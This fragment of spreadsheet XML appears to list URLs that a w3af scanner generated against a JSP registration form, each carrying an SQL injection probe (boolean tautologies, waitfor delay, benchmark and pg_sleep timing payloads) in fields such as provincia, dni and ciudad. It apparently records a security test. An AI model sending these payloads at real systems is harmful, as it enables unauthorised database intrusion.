    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0"+and+"40"="41&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0'+or+'40'='40&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0'+and+'40'='41&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0+or+40=40+&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0+and+40=41+&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1;waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1);waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1));waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1';waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1');waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1'));waitfor+delay+'0:0:5'--&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1+or+benchmark(2500000,md5(1))&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1+or+pg_sleep(5)&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1'+or+pg_sleep(5)+or+'1'='1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=1"+or+pg_sleep(5)+or+"1"="1&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=2"+or+"2"="2&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=2"+and+"2"="3&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=2'+or+'2'='2&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=2'+and+'2'='3&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=2+or+2=2+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=2+and+2=3+&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1;waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1);waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1';waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1');waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1'));waitfor+delay+'0:0:5'--&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1+or+benchmark(2500000,md5(1))&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1+or+pg_sleep(5)&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1'+or+pg_sleep(5)+or+'1'='1&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=1"+or+pg_sleep(5)+or+"1"="1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71"+or+"71"="71&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=71"+and+"71"="72&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=71'+or+'71'='71&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=71'+and+'71'='72&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=71+or+71=71+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=71+and+71=72+&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1;waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1);waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1';waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1');waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'));waitfor+delay+'0:0:5'--&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1+or+benchmark(2500000,md5(1))&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1+or+pg_sleep(5)&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1'+or+pg_sleep(5)+or+'1'='1&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=1"+or+pg_sleep(5)+or+"1"="1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98"+or+"98"="98&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=98"+and+"98"="99&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=98'+or+'98'='98&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=98'+and+'98'='99&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=98+or+98=98+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=98+and+98=99+&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1;waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1);waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1';waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1');waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'));waitfor+delay+'0:0:5'--&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+benchmark(2500000,md5(1))&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1+or+pg_sleep(5)&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1'+or+pg_sleep(5)+or+'1'='1&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=1"+or+pg_sleep(5)+or+"1"="1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29"+or+"29"="29&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=29"+and+"29"="30&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=29'+or+'29'='29&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=29'+and+'29'='30&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=29+or+29=29+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=29+and+29=30+&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1;waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1);waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1';waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1');waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+benchmark(2500000,md5(1))&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+pg_sleep(5)&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+pg_sleep(5)+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+pg_sleep(5)+or+"1"="1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56&amp;email=w3af@email.com&amp;modo=registro"+or+"6"="6</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro"+and+"6"="7</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro'+or+'6'='6</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro'+and+'6'='7</t>
  </si>
  <si>
